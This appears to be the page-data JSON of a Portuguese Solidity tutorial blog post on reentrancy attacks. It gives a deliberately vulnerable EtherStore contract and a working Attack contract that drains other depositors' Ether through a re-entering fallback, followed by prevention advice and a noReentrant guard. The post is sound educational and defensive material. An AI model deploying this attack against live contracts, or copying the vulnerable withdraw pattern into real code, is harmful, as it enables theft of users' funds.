{"componentChunkName":"component---src-templates-blog-page-index-tsx","path":"/ataque-de-reentrada/","result":{"data":{"mdx":{"body":"var _excluded = [\"components\"];\n\nfunction _extends() { _extends = Object.assign ? Object.assign.bind() : function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; }; return _extends.apply(this, arguments); }\n\nfunction _objectWithoutProperties(source, excluded) { if (source == null) return {}; var target = _objectWithoutPropertiesLoose(source, excluded); var key, i; if (Object.getOwnPropertySymbols) { var sourceSymbolKeys = Object.getOwnPropertySymbols(source); for (i = 0; i < sourceSymbolKeys.length; i++) { key = sourceSymbolKeys[i]; if (excluded.indexOf(key) >= 0) continue; if (!Object.prototype.propertyIsEnumerable.call(source, key)) continue; target[key] = source[key]; } } return target; }\n\nfunction _objectWithoutPropertiesLoose(source, excluded) { if (source == null) return {}; var target = {}; var sourceKeys = Object.keys(source); var key, i; for (i = 0; i < sourceKeys.length; i++) { key = sourceKeys[i]; if (excluded.indexOf(key) >= 0) continue; target[key] = source[key]; } return target; }\n\n/* @jsxRuntime classic */\n\n/* @jsx mdx */\nvar _frontmatter = {\n  \"layout\": \"BlogPage\",\n  \"title\": \"Ataque de reentrada, aprenda como funciona e como evitar\",\n  \"description\": \"Nesse artigo iremos aprender a como um contrato malicioso de reentrada funciona e como previnir um ataque em seu contrato inteligente.\",\n  \"image\": \"capa.jpg\",\n  \"tags\": [\"Intermediário\", \"Hacks\"],\n  \"author\": [\"Matheus\"],\n  \"publishedAt\": \"17/06/2022\",\n  \"modifiedAt\": \"20220617\",\n  \"suburl\": \"ataque-de-reentrada/\"\n};\nvar layoutProps = {\n  _frontmatter: _frontmatter\n};\nvar MDXLayout = \"wrapper\";\nreturn function MDXContent(_ref) {\n  var components = _ref.components,\n      props = _objectWithoutProperties(_ref, _excluded);\n\n  return mdx(MDXLayout, _extends({}, layoutProps, props, {\n    components: components,\n    mdxType: \"MDXLayout\"\n  }), mdx(\"p\", null, \"Nesse artigo iremos aprender a como um contrato malicioso de reentrada funciona e como previnir um ataque em seu contrato inteligente.\"), mdx(\"h2\", {\n    \"id\": \"vulnerabilidade\"\n  }, \"Vulnerabilidade\"), mdx(\"p\", null, \"Digamos que o contrato \", mdx(\"inlineCode\", {\n    parentName: \"p\"\n  }, \"A\"), \" chama contrato \", mdx(\"inlineCode\", {\n    parentName: \"p\"\n  }, \"B\"), \".\", mdx(\"br\", null), \"\\nA explora\\xE7\\xE3o de reentrada permite \", mdx(\"inlineCode\", {\n    parentName: \"p\"\n  }, \"B\"), \" chamar de volta \", mdx(\"inlineCode\", {\n    parentName: \"p\"\n  }, \"A\"), \" antes que \", mdx(\"inlineCode\", {\n    parentName: \"p\"\n  }, \"A\"), \" termine a execu\\xE7\\xE3o.\", mdx(\"br\", null)), mdx(\"p\", null, mdx(\"strong\", {\n    parentName: \"p\"\n  }, \"Um exemplo de como um ataque funciona:\"), mdx(\"br\", null), \"\\nEtherStore \\xE9 um contrato onde voc\\xEA pode depositar e retirar ETH.\", mdx(\"br\", null), \"\\nEste contrato \\xE9 vulner\\xE1vel ao ataque de reentrada.\", mdx(\"br\", null), \"\\nVamos ver por qu\\xEA.\"), mdx(\"ol\", null, mdx(\"li\", {\n    parentName: \"ol\"\n  }, \"Implante o contrato EtherStore\"), mdx(\"li\", {\n    parentName: \"ol\"\n  }, \"As contas de Alice (Conta 1) e Bob (Conta 2) na EtherStore depositam 1 Ether cada\"), mdx(\"li\", {\n    parentName: \"ol\"\n  }, \"Implante o ataque com o endere\\xE7o da EtherStore\"), mdx(\"li\", {\n    parentName: \"ol\"\n  }, \"Chame Attack.attack enviando 1 ether (usando a do Eve (Conta 3)). Voc\\xEA receber\\xE1 3 Ethers de volta (2 Ethers roubados de Alice e Bob, mais 1 Ether enviado deste contrato)\")), mdx(\"p\", null, mdx(\"strong\", {\n    parentName: \"p\"\n  }, \"O que aconteceu?\"), mdx(\"br\", null), \"\\nO ataque conseguiu chamar \", mdx(\"inlineCode\", {\n    parentName: \"p\"\n  }, \"EtherStore.withdraw\"), \" v\\xE1rias vezes antes que \", mdx(\"inlineCode\", {\n    parentName: \"p\"\n  }, \"EtherStore.withdraw\"), \" termina-se de executar.\"), mdx(\"p\", null, \"Aqui est\\xE1 como as fun\\xE7\\xF5es foram chamadas:\"), mdx(\"ul\", null, mdx(\"li\", {\n    parentName: \"ul\"\n  }, \"Attack.attack\"), mdx(\"li\", {\n    parentName: \"ul\"\n  }, \"EtherStore.deposit\"), mdx(\"li\", {\n    parentName: \"ul\"\n  }, \"EtherStore.withdraw\"), mdx(\"li\", {\n    parentName: \"ul\"\n  }, \"Fallback de ataque (recebe 1 Ether)\"), mdx(\"li\", {\n    parentName: \"ul\"\n  }, \"EtherStore.withdraw\"), mdx(\"li\", {\n    parentName: \"ul\"\n  }, \"Attack.fallback (recebe 1 Ether)\"), mdx(\"li\", {\n    parentName: \"ul\"\n  }, \"EtherStore.withdraw\"), mdx(\"li\", {\n    parentName: \"ul\"\n  }, \"Fallback de ataque (recebe 1 Ether)\")), mdx(\"pre\", null, mdx(\"code\", {\n    parentName: \"pre\",\n    \"className\": \"language-js\"\n  }, \"// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.13;\\n\\ncontract EtherStore {\\n    mapping(address => uint) public balances;\\n\\n    function deposit() public payable {\\n        balances[msg.sender] += msg.value;\\n    }\\n\\n    function withdraw() public {\\n        uint bal = balances[msg.sender];\\n        require(bal > 0);\\n\\n        (bool sent, ) = msg.sender.call{value: bal}(\\\"\\\");\\n        require(sent, \\\"Falha ao enviar Ether\\\");\\n\\n        balances[msg.sender] = 0;\\n    }\\n\\n    // Fun\\xE7\\xE3o auxiliar para verificar o saldo deste contrato\\n    function getBalance() public view returns (uint) {\\n        return address(this).balance;\\n    }\\n}\\n\\ncontract Attack {\\n    EtherStore public etherStore;\\n\\n    constructor(address _etherStoreAddress) {\\n        etherStore = EtherStore(_etherStoreAddress);\\n    }\\n\\n    // Fallback \\xE9 chamado quando EtherStore envia Ether para este contrato.\\n    fallback() external payable {\\n        if (address(etherStore).balance >= 1 ether) {\\n            etherStore.withdraw();\\n        }\\n    }\\n\\n    function attack() external payable {\\n        require(msg.value >= 1 ether);\\n        etherStore.deposit{value: 1 ether}();\\n        etherStore.withdraw();\\n    }\\n\\n    // Fun\\xE7\\xE3o auxiliar para verificar o saldo deste contrato\\n    function getBalance() public view returns (uint) {\\n        return address(this).balance;\\n    }\\n}\\n\")), mdx(\"br\", null), mdx(\"h2\", {\n    \"id\": \"técnicas-preventivas\"\n  }, \"T\\xE9cnicas Preventivas\"), mdx(\"ul\", null, mdx(\"li\", {\n    parentName: \"ul\"\n  }, \"Certifique-se de que todas as mudan\\xE7as de estado aconte\\xE7am antes de chamar contratos externos\"), mdx(\"li\", {\n    parentName: \"ul\"\n  }, \"Use modificadores de fun\\xE7\\xE3o que impe\\xE7am a reentrada\")), mdx(\"p\", null, \"Aqui est\\xE1 um exemplo de como proteger seu contrato de um ataque de reentrada\"), mdx(\"pre\", null, mdx(\"code\", {\n    parentName: \"pre\",\n    \"className\": \"language-js\"\n  }, \"// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.13;\\n\\ncontract ReEntrancyGuard {\\n    bool internal locked;\\n\\n    modifier noReentrant() {\\n        require(!locked, \\\"Bloqueado para reentrada at\\xE9 finalizar a opera\\xE7\\xE3o atual\\\");\\n        locked = true;\\n        _;\\n        locked = false;\\n    }\\n}\\n\")), mdx(\"br\", null), mdx(\"h3\", {\n    \"id\": \"testar-no-remix\"\n  }, \"Testar no \", mdx(\"a\", {\n    parentName: \"h3\",\n    \"href\": \"https://remix.ethereum.org/\",\n    \"target\": \"_blank\",\n    \"rel\": \"noopener\"\n  }, \"Remix\")), mdx(\"br\", null), mdx(\"br\", null));\n}\n;\nMDXContent.isMDXComponent = true;","frontmatter":{"title":"Ataque de reentrada, aprenda como funciona e como evitar","description":"Nesse artigo iremos aprender a como um contrato malicioso de reentrada funciona e como previnir um ataque em seu contrato inteligente.","image":{"childImageSharp":{"fluid":{"base64":"data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAANABQDASIAAhEBAxEB/8QAGAAAAwEBAAAAAAAAAAAAAAAAAAIEAQP/xAAUAQEAAAAAAAAAAAAAAAAAAAAA/9oADAMBAAIQAxAAAAGyjsxgwf/EABkQAAMBAQEAAAAAAAAAAAAAAAECEhEEEP/aAAgBAQABBQJTnQ9hV2ZFef/EABQRAQAAAAAAAAAAAAAAAAAAABD/2gAIAQMBAT8BP//EABQRAQAAAAAAAAAAAAAAAAAAABD/2gAIAQIBAT8BP//EAB0QAAICAgMBAAAAAAAAAAAAAAERAAIxUQMQEkH/2gAIAQEABj8CIPITazQ1GHY6geZ6+zPX/8QAGxAAAgIDAQAAAAAAAAAAAAAAAREAIRAxQVH/2gAIAQEAAT8hYSCOghFpHFOERBSWJrAB2VcR9Y//2gAMAwEAAgADAAAAELDP/8QAFBEBAAAAAAAAAAAAAAAAAAAAEP/aAAgBAwEBPxA//8QAFBEBAAAAAAAAAAAAAAAAAAAAEP/aAAgBAgEBPxA//8QAHhABAAIBBAMAAAAAAAAAAAAAAQARIUFhgdExcZH/2gAIAQEAAT8QG98DZzAmj1vH/EsrX0RiDBSrHjEzXooTY91cW0uDqVRXnef/2Q==","aspectRatio":1.5151515151515151,"src":"/static/1b748035448b3f0bf54995a07df36894/0cb3d/capa.jpg","srcSet":"/static/1b748035448b3f0bf54995a07df36894/f836f/capa.jpg 200w,\n/static/1b748035448b3f0bf54995a07df36894/2244e/capa.jpg 400w,\n/static/1b748035448b3f0bf54995a07df36894/0cb3d/capa.jpg 536w","sizes":"(max-width: 536px) 100vw, 536px"}}},"tags":["Intermediário","Hacks"],"author":["Matheus"],"suburl":"ataque-de-reentrada/","publishedAt":"17/06/2022","modifiedAt":"20220617"},"tableOfContents":{"items":[{"url":"#vulnerabilidade","title":"Vulnerabilidade"},{"url":"#técnicas-preventivas","title":"Técnicas Preventivas","items":[{"url":"#testar-no-remix","title":"Testar no Remix"}]}]},"timeToRead":1},"allMdx":{"nodes":[{"frontmatter":{"suburl":"sistema-de-swap-estavel-amm/","title":"Como criar um sistema de Swap estável AMM","tags":["Avançado","DeFi"]}},{"frontmatter":{"suburl":"produto-constante-amm/","title":"Como criar um produto constante AMM","tags":["Intermediário","DeFi"]}},{"frontmatter":{"suburl":"soma-constante-amm/","title":"Como criar uma soma constante AMM","tags":["Intermediário","DeFi"]}},{"frontmatter":{"suburl":"sistema-de-cofre/","title":"Como criar um sistema de Cofre","tags":["Intermediário","DeFi"]}},{"frontmatter":{"suburl":"sistema-de-staking/","title":"Como criar um sistema de Staking de Recompensas","tags":["Intermediário","Avançado","DeFi"]}},{"frontmatter":{"suburl":"sistema-de-preco-chainlink-oracle/","title":"Como criar um sistema de preços Oracle","tags":["Intermediário","Avançado","DeFi"]}},{"frontmatter":{"suburl":"exemplos-de-uso-do-uniswap-v3/","title":"Exemplos de uso do Uniswap V3","tags":["Intermediário","Avançado","DeFi"]}},{"frontmatter":{"suburl":"fornecimento-unilateral-com-uniswap-v2/","title":"Fornecimento unilateral ideal com Uniswap V2","tags":["Intermediário","Avançado","DeFi"]}},{"frontmatter":{"suburl":"adicionar-e-remover-liquidez-com-uniswap-v2/","title":"Como adicionar e remover liquidez com Uniswap V2","tags":["Intermediário","Avançado","DeFi"]}},{"frontmatter":{"suburl":"swap-com-uniswap-v2/","title":"Como realizar Swap com Uniswap V2","tags":["Intermediário","DeFi"]}},{"frontmatter":{"suburl":"testes-com-echidna/","title":"Como realizar testes com Echidna","tags":["Intermediário"]}},{"frontmatter":{"suburl":"ignorar-verificacao-do-tamanho-do-contrato/","title":"Como ignorar a verificação do tamanho do contrato","tags":["Intermediário","Hacks"]}},{"frontmatter":{"suburl":"repeticao-de-assinatura/","title":"Repetição de assinatura","tags":["Avançado","Hacks"]}},{"frontmatter":{"suburl":"manipular-timestamp-do-bloco/","title":"Manipulando o timestamp do bloco na blockchain","tags":["Intermediário","Hacks"]}},{"frontmatter":{"suburl":"ataque-front-running/","title":"Ataque utilizando a técnica front running","tags":["Intermediário","Hacks"]}},{"frontmatter":{"suburl":"honeypot/","title":"Criar uma armadilha para hackers com a técnica honeypot","tags":["Intermediário","Hacks"]}},{"frontmatter":{"suburl":"ocultar-script-malicioso/","title":"Como um contrato malicioso esconde seu script","tags":["Intermediário","Hacks"]}},{"frontmatter":{"suburl":"phishing-com-txorigin/","title":"Phishing com tx.origin","tags":["Intermediário","Hacks"]}},{"frontmatter":{"suburl":"negacao-de-servico/","title":"Inutilizar um contrato através da negação de serviço","tags":["Intermediário","Hacks"]}},{"frontmatter":{"suburl":"fonte-de-aleatoriedade/","title":"Fonte de Aleatoriedade","tags":["Intermediário","Hacks"]}},{"frontmatter":{"suburl":"chamada-de-funcao-delegatecall/","title":"Chamada de função delegatecall","tags":["Intermediário","Hacks"]}},{"frontmatter":{"suburl":"acessando-variaveis-privadas/","title":"Acessando variáveis privadas","tags":["Intermediário","Hacks"]}},{"frontmatter":{"suburl":"auto-destruicao/","title":"Ataques com Auto-destruição","tags":["Intermediário","Hacks"]}},{"frontmatter":{"suburl":"estouro-de-memoria/","title":"Ataques com estouro de memória","tags":["Intermediário","Hacks"]}},{"frontmatter":{"suburl":"ataque-de-reentrada/","title":"Ataque de reentrada, aprenda como funciona e como evitar","tags":["Intermediário","Hacks"]}},{"frontmatter":{"suburl":"bloqueio-de-tempo-timelock/","title":"Criar um contrato com bloqueio de tempo","tags":["Avançado","Aplicações"]}},{"frontmatter":{"suburl":"contrato-para-multichamadas/","title":"Criar contrato para Multichamada de funções","tags":["Avançado","Aplicações"]}},{"frontmatter":{"suburl":"financiamento-coletivo-crowd-fund/","title":"Criar um sistema de financiamento coletivo","tags":["Avançado","Aplicações"]}},{"frontmatter":{"suburl":"sistema-de-leilao-ingles-holandes/","title":"Criar um sistema de leilão inglês e holandês","tags":["Avançado","Aplicações"]}},{"frontmatter":{"suburl":"canal-de-pagamento-bidirecional/","title":"Criar um Canal de pagamento bidirecional","tags":["Avançado","Aplicações"]}},{"frontmatter":{"suburl":"canal-de-pagamento-unidirecional/","title":"Criar um Canal de pagamento unidirecional","tags":["Avançado","Aplicações"]}},{"frontmatter":{"suburl":"gravar-dados-no-slot/","title":"Como gravar dados em qualquer slot","tags":["Intermediário","Aplicações"]}},{"frontmatter":{"suburl":"implantar-contrato-com-proxy/","title":"Como implantar qualquer contrato com Proxy","tags":["Avançado","Aplicações"]}},{"frontmatter":{"suburl":"trabalhando-com-proxy/","title":"Trabalhando com Proxy","tags":["Avançado","Aplicações"]}},{"frontmatter":{"suburl":"precomputar-endereco-contrato/","title":"Pré-computar endereço do Contrato com Create2","tags":["Avançado","Aplicações"]}},{"frontmatter":{"suburl":"token-erc721/","title":"Criando nosso primeiro Token ERC721","tags":["Intermediário","Avançado","Aplicações"]}},{"frontmatter":{"suburl":"token-erc20/","title":"Criando nosso primeiro Token ERC20","tags":["Intermediário","Avançado","Aplicações"]}},{"frontmatter":{"suburl":"aplicacao-mapeamento-iteravel/","title":"Mapeamento Iterável","tags":["Intermediário","Aplicações"]}},{"frontmatter":{"suburl":"aplicacao-arvore-merkle/","title":"Árvore de Merkle","tags":["Avançado","Aplicações"]}},{"frontmatter":{"suburl":"aplicacao-multi-assinatura/","title":"Carteira com Multi-Assinaturas","tags":["Intermediário","Avançado","Aplicações"]}},{"frontmatter":{"suburl":"aplicacao-wallet/","title":"Carteira de Tokens","tags":["Iniciante","Aplicações"]}},{"frontmatter":{"suburl":"assinaturas-e-hashing-keccak/","title":"Verificando assinatura hashing com Keccak256","tags":["Intermediário","Avançado"]}},{"frontmatter":{"suburl":"abi/","title":"O que é ABI e para que serve?","tags":["Iniciante"]}},{"frontmatter":{"suburl":"import-e-libraries/","title":"Import e Libraries, para que servem?","tags":["Iniciante","Intermediário"]}},{"frontmatter":{"suburl":"criar-contrato-simples/","title":"Criar um contrato através de outro contrato","tags":["Intermediário"]}},{"frontmatter":{"suburl":"call-fallback-delegatecall/","title":"Call, Fallback, Delegatecall e chamadas de contratos","tags":["Intermediário"]}},{"frontmatter":{"suburl":"transfer-send-call/","title":"Enviar Ether com transfer, send e call","tags":["Iniciante","Intermediário"]}},{"frontmatter":{"suburl":"visibilidade-interface-pagavel/","title":"Visibilidade, Interfaces e Funções Pagáveis","tags":["Intermediário"]}},{"frontmatter":{"suburl":"evento-construtor-heranca/","title":"Evento, Construtor e Herança","tags":["Iniciante","Intermediário"]}},{"frontmatter":{"suburl":"tratamento-de-erros/","title":"Tratamento de erros de condições e exceções","tags":["Iniciante","Intermediário"]}},{"frontmatter":{"suburl":"funcoes/","title":"Funções e Modificadores","tags":["Iniciante","Intermediário"]}},{"frontmatter":{"suburl":"armazenamento/","title":"Armazenamento de Dados","tags":["Intermediário"]}},{"frontmatter":{"suburl":"estruturas/","title":"Estruturas - Struct","tags":["Iniciante","Intermediário"]}},{"frontmatter":{"suburl":"enum/","title":"Enum - Enumeradores","tags":["Iniciante","Intermediário"]}},{"frontmatter":{"suburl":"mapping-arrays/","title":"Mapping e Arrays","tags":["Iniciante"]}},{"frontmatter":{"suburl":"if-else-for-while/","title":"If, Else, For e While","tags":["Iniciante"]}},{"frontmatter":{"suburl":"ether-wei-gas/","title":"Ether, Wei e Taxa de Gas","tags":["Iniciante"]}},{"frontmatter":{"suburl":"variaveis/","title":"Entendendo as Variáveis","tags":["Iniciante"]}},{"frontmatter":{"suburl":"primeiro-aplicativo/","title":"Meu primeiro aplicativo","tags":["Iniciante","Aplicações"]}}]},"topicsYaml":{"topics":[{"desc":"Todos os conteúdos de nível iniciante estão disponíveis aqui","title":"Iniciante","url":"iniciante/"},{"desc":"Todos os conteúdos de nível intermediário estão disponíveis aqui","title":"Intermediário","url":"intermediario/"},{"desc":"Todos os conteúdos de nível avançado estão disponíveis aqui","title":"Avançado","url":"avancado/"},{"desc":"Todos os artigos referentes a exemplos de aplicações do Solidity, estão disponíveis aqui","title":"Aplicações","url":"aplicacoes/"},{"desc":"Todos os artigos referentes a exemplos de aplicação de hacks do Solidity, estão disponíveis aqui","title":"Hacks","url":"hacks/"},{"desc":"Todos os artigos referentes a exemplos de aplicação DeFi do Solidity, estão disponíveis aqui","title":"DeFi","url":"defi/"},{"desc":"Artigos de outras linguagens de programação, exemplos de interação entre a blockchain e aplicativos externos, estão disponíveis aqui","title":"Outros Artigos","url":"artigos/"}]}},"pageContext":{"suburl":"ataque-de-reentrada/","postTopics":["Intermediário","Hacks"],"publishedAt":"17/06/2022","prevArticle":{"title":"Criar um contrato com bloqueio de tempo","layout":"BlogPage","suburl":"bloqueio-de-tempo-timelock/","author":["Matheus"],"tags":["Avançado","Aplicações"],"publishedAt":"16/06/2022","modifiedAt":"20220616"},"nextArticle":{"title":"Ataques com estouro de memória","layout":"BlogPage","suburl":"estouro-de-memoria/","author":["Matheus"],"tags":["Intermediário","Hacks"],"publishedAt":"18/06/2022","modifiedAt":"20220618"}}},"staticQueryHashes":["119291576","2330562257","4065828390"]}